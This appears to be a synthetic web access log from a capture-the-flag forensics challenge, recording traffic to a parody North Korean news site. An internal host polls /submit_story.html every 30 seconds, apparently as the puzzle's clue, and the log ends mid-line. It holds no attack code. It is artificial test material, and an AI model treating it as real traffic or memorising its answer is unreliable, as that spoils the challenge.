"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +136.62.242.45 - - [23/Jul/2020:11:54:28 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.0" 200 12996 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +192.168.51.66 - - [23/Jul/2020:11:54:28 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +153.179.80.53 - - [23/Jul/2020:11:54:32 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 4193 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)" +234.76.138.57 - - [23/Jul/2020:11:54:36 -0500] "GET / HTTP/1.1" 200 3624 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +39.143.168.71 - - [23/Jul/2020:11:54:40 -0500] "GET /kim-jong-fun/ HTTP/1.0" 200 3098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" +245.83.205.69 - - [23/Jul/2020:11:54:42 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 14529 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +85.225.254.180 - - [23/Jul/2020:11:54:43 -0500] "GET / HTTP/1.1" 200 4377 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +200.176.109.129 - - [23/Jul/2020:11:54:44 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 7123 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +220.53.66.142 - - [23/Jul/2020:11:54:48 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.1" 200 7916 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +115.46.117.48 - - [23/Jul/2020:11:54:49 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 11749 "http://www.foxnews.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +163.239.61.198 - - [23/Jul/2020:11:54:50 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 400 10730 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +78.3.67.83 - - [23/Jul/2020:11:54:52 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 3477 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4" +111.101.141.104 - - [23/Jul/2020:11:54:54 -0500] "POST /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 2541 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +213.235.119.235 - - [23/Jul/2020:11:54:57 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 13582 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +62.54.231.101 - - [23/Jul/2020:11:54:58 -0500] "POST /new-medicine-developed-in-dprk/ HTTP/1.1" 200 9840 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +192.168.51.66 - - [23/Jul/2020:11:54:58 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +89.68.180.242 - - [23/Jul/2020:11:55:01 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 11041 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +196.122.44.129 - - [23/Jul/2020:11:55:05 -0500] "POST /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 403 8005 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +105.246.242.200 - - [23/Jul/2020:11:55:09 -0500] "GET /en/nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 9676 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +187.124.212.41 - - [23/Jul/2020:11:55:10 -0500] "POST /en/sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 6576 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +150.153.207.222 - - [23/Jul/2020:11:55:14 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.0" 200 9803 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +47.128.217.128 - - [23/Jul/2020:11:55:18 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 3513 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +243.105.98.211 - - [23/Jul/2020:11:55:21 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 8744 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +251.45.240.207 - - [23/Jul/2020:11:55:23 -0500] "GET /latest-rocket/ HTTP/1.1" 200 10275 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +194.109.221.168 - - [23/Jul/2020:11:55:25 -0500] "POST /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 7165 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +23.203.94.126 - - [23/Jul/2020:11:55:28 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 304 11954 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:55:28 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +242.121.96.235 - - [23/Jul/2020:11:55:32 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 301 13840 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +24.206.206.25 - - [23/Jul/2020:11:55:33 -0500] "GET / HTTP/1.1" 200 13807 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +38.231.118.160 - - [23/Jul/2020:11:55:35 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.1" 200 6241 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +116.100.188.182 - - [23/Jul/2020:11:55:37 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 14024 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +18.48.112.78 - - [23/Jul/2020:11:55:38 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 301 14173 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +8.75.132.101 - - [23/Jul/2020:11:55:40 -0500] "GET /song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 13981 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +45.245.43.208 - - [23/Jul/2020:11:55:43 -0500] "POST /quality-waterproof-liquid-made/ HTTP/1.1" 200 7560 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +18.11.182.139 - - [23/Jul/2020:11:55:45 -0500] "GET /en/dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 403 5216 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +22.36.110.56 - - [23/Jul/2020:11:55:46 -0500] "GET /en/nuke-the-chinese/ HTTP/1.1" 200 10616 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +82.33.181.197 - - [23/Jul/2020:11:55:48 -0500] "GET /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 7175 "http://www.foxnews.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +184.9.167.52 - - [23/Jul/2020:11:55:50 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 5300 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +226.164.123.210 - - [23/Jul/2020:11:55:52 -0500] "POST /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 13879 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +88.108.237.163 - - [23/Jul/2020:11:55:56 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 6943 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +80.93.155.164 - - [23/Jul/2020:11:55:58 -0500] "POST / HTTP/1.1" 200 14823 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:55:58 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +178.108.171.106 - - [23/Jul/2020:11:55:59 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 500 8029 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +11.215.186.46 - - [23/Jul/2020:11:56:00 -0500] "GET /en/ HTTP/1.1" 200 11810 "http://www.foxnews.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +109.212.158.154 - - [23/Jul/2020:11:56:02 -0500] "GET /en/north-kiringul-missile-program/ HTTP/1.1" 304 14179 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +74.136.189.206 - - [23/Jul/2020:11:56:03 -0500] "POST /en/performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 301 10075 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +73.54.36.38 - - [23/Jul/2020:11:56:06 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 11824 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +155.94.160.73 - - [23/Jul/2020:11:56:08 -0500] "POST /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.0" 301 12573 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" +240.234.156.231 - - [23/Jul/2020:11:56:11 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 200 9180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +13.215.33.179 - - [23/Jul/2020:11:56:13 -0500] "GET /en/ HTTP/1.1" 400 3494 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +60.25.251.66 - - [23/Jul/2020:11:56:17 -0500] "GET /nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 10627 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +215.147.94.12 - - [23/Jul/2020:11:56:20 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 404 5172 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +143.194.25.51 - - [23/Jul/2020:11:56:22 -0500] "POST /en/sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 5058 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +87.198.110.241 - - [23/Jul/2020:11:56:26 -0500] "POST /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 13270 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:56:29 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +149.221.175.241 - - [23/Jul/2020:11:56:29 -0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.0" 200 13763 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +96.229.30.65 - - [23/Jul/2020:11:56:30 -0500] "POST / HTTP/1.1" 200 13177 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +233.170.105.4 - - [23/Jul/2020:11:56:33 -0500] "GET /en/new-books-published-in-dprk/ HTTP/1.1" 200 2091 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +97.248.223.250 - - [23/Jul/2020:11:56:35 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 3771 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +205.106.111.114 - - [23/Jul/2020:11:56:36 -0500] "GET /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 500 10798 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +171.67.154.13 - - [23/Jul/2020:11:56:39 -0500] "GET / HTTP/1.1" 200 12265 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +51.139.108.190 - - [23/Jul/2020:11:56:40 -0500] "GET / HTTP/1.1" 200 3273 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +47.108.208.69 - - [23/Jul/2020:11:56:41 -0500] "POST /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 400 10917 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +228.14.48.106 - - [23/Jul/2020:11:56:43 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 9685 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +185.224.123.216 - - [23/Jul/2020:11:56:47 -0500] "GET /nuke-the-chinese/ HTTP/1.1" 200 11797 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +60.203.31.131 - - [23/Jul/2020:11:56:50 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 14157 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +101.105.10.19 - - [23/Jul/2020:11:56:52 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 2518 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +175.198.78.73 - - [23/Jul/2020:11:56:53 -0500] "GET /dancing-parties-held/ HTTP/1.1" 200 12745 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +225.73.96.204 - - [23/Jul/2020:11:56:57 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 3042 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +192.168.51.66 - - [23/Jul/2020:11:56:59 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +196.88.133.175 - - [23/Jul/2020:11:56:59 -0500] "GET /en/ HTTP/1.1" 200 3797 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +100.129.250.37 - - [23/Jul/2020:11:57:02 -0500] "POST /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 2942 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +103.108.159.178 - - [23/Jul/2020:11:57:05 -0500] "GET /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 11116 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" +77.82.141.227 - - [23/Jul/2020:11:57:06 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 13990 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +3.104.99.47 - - [23/Jul/2020:11:57:10 -0500] "GET /99-problems/ HTTP/1.1" 403 11702 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +97.191.111.207 - - [23/Jul/2020:11:57:12 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 5677 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +248.5.235.93 - - [23/Jul/2020:11:57:16 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 9547 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +137.151.84.106 - - [23/Jul/2020:11:57:20 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 11020 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +185.136.88.97 - - [23/Jul/2020:11:57:23 -0500] "POST /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 14487 "http://www.google.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +118.109.35.240 - - [23/Jul/2020:11:57:26 -0500] "GET /en/ HTTP/1.1" 200 12925 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +133.131.31.208 - - [23/Jul/2020:11:57:29 -0500] "GET /en/pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 200 13061 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +13.95.251.35 - - [23/Jul/2020:11:57:31 -0500] "GET /en/kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 301 6188 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +39.66.77.105 - - [23/Jul/2020:11:57:33 -0500] "GET / HTTP/1.1" 200 14908 "http://www.google.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +202.187.15.25 - - [23/Jul/2020:11:57:35 -0500] "POST /tele-education-system-upgraded/ HTTP/1.0" 200 4635 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +239.143.33.73 - - [23/Jul/2020:11:57:39 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 14626 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +89.204.163.174 - - [23/Jul/2020:11:57:42 -0500] "POST /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 2882 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +124.218.186.102 - - [23/Jul/2020:11:57:44 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 9246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +99.93.170.54 - - [23/Jul/2020:11:57:45 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 6893 "-" "Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0" +115.92.173.207 - - [23/Jul/2020:11:57:47 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 2212 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +11.24.30.231 - - [23/Jul/2020:11:57:50 -0500] "POST /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 2034 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +193.162.74.206 - - [23/Jul/2020:11:57:53 -0500] "GET /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 9773 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +118.191.50.151 - - [23/Jul/2020:11:57:57 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 500 11733 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:57:59 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +226.182.219.79 - - [23/Jul/2020:11:57:59 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 5219 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +232.148.174.147 - - [23/Jul/2020:11:58:03 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 500 5454 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +150.168.153.242 - - [23/Jul/2020:11:58:05 -0500] "GET /en/pyingpong-puppet-company/ HTTP/1.0" 200 14144 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +162.235.6.233 - - [23/Jul/2020:11:58:08 -0500] "GET /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 500 4828 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +157.169.92.53 - - [23/Jul/2020:11:58:10 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 13670 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +153.119.197.85 - - [23/Jul/2020:11:58:12 -0500] "POST /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 3054 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +236.88.61.26 - - [23/Jul/2020:11:58:14 -0500] "POST / HTTP/1.1" 400 3943 "http://www.foxnews.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36" +217.191.45.74 - - [23/Jul/2020:11:58:16 -0500] "POST /en/many-medical-scientific-achievements-made/ HTTP/1.1" 200 13638 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +84.249.121.26 - - [23/Jul/2020:11:58:17 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 9120 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +52.250.217.228 - - [23/Jul/2020:11:58:21 -0500] "GET / 